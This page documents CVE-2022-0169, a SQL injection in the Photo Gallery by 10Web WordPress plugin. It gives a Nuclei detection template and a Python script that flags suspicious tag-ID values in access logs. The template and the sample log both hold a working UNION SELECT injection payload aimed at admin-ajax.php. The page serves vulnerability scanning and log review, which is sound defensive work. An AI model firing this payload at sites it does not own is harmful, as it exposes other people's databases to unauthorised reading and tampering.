Photo Gallery by 10Web < 1.6.0 - SQL Injection
ID: CVE-2022-0169
Severity: critical
Author: ritikchaddha,princechaddha
Tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web
Description
The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection.
YAML Source
id: CVE-2022-0169

info:
  name: Photo Gallery by 10Web < 1.6.0 - SQL Injection
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: This is resolved in release 1.6.0.
  reference:
    - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c
    - https://wordpress.org/plugins/photo-gallery/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0169
    - https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0169
    cwe-id: CWE-89
    epss-score: 0.01246
    epss-percentile: 0.85214
    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: photo_gallery
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/photo-gallery
    fofa-query: body=/wp-content/plugins/photo-gallery
    publicwww-query: "/wp-content/plugins/photo-gallery"
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 490a0046304402202f5cceb3233aa41a040b14916ab2282acd30ba45018020514f9f19f2becc5072022022c8b1969405d8a5583d53bf8de3c5e2df541822881ac11c633faab1d9615f81:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0169.yaml"
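
A log-review complement to the scan, added here as an example (it is not part of the original template or of the plugin's code): it flags access-log requests to the bwg_frontend_data AJAX action whose bwg_tag_id_bwg_thumbnails_0 values are not plain integers. It assumes combined-format access logs and that legitimate tag IDs are integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# AJAX action and parameter named in the CVE-2022-0169 description.
ACTION = "bwg_frontend_data"
# The parameter may arrive with PHP array syntax: name[], name[0], ...
KEY_RE = re.compile(r"bwg_tag_id_bwg_thumbnails_0(\[[^\]]*\])?")
# Assumption (not stated on the page): legitimate tag IDs are plain integers.
INT_RE = re.compile(r"\d+")
# Client IP, request target and status from a combined-format access log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2022:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Mar/2022:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2%20--%20g HTTP/1.1" 200 733',
    '192.0.2.10 - - [10/Mar/2022:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

def suspicious_values(target):
    """Return the non-integer tag-ID values carried by one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    # parse_qsl percent-decodes keys and values, so encoded input is compared decoded.
    pairs = parse_qsl(parts.query)
    if ("action", ACTION) not in pairs:
        return []
    return [value for key, value in pairs
            if KEY_RE.fullmatch(key) and not INT_RE.fullmatch(value)]

def scan(lines):
    """Return (client_ip, status, decoded_value) for every flagged request."""
    hits = []
    for line in lines:
        match = LINE_RE.match(line)
        if not match:
            continue  # not a combined-format request line
        ip, target, status = match.groups()
        hits.extend((ip, int(status), value) for value in suspicious_values(target))
    return hits

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} non-integer tag id: {value!r}")
```

Only query-string parameters appear in access logs, so the same action sent with the parameter in a POST body would need request-body logging or a WAF rule to be seen.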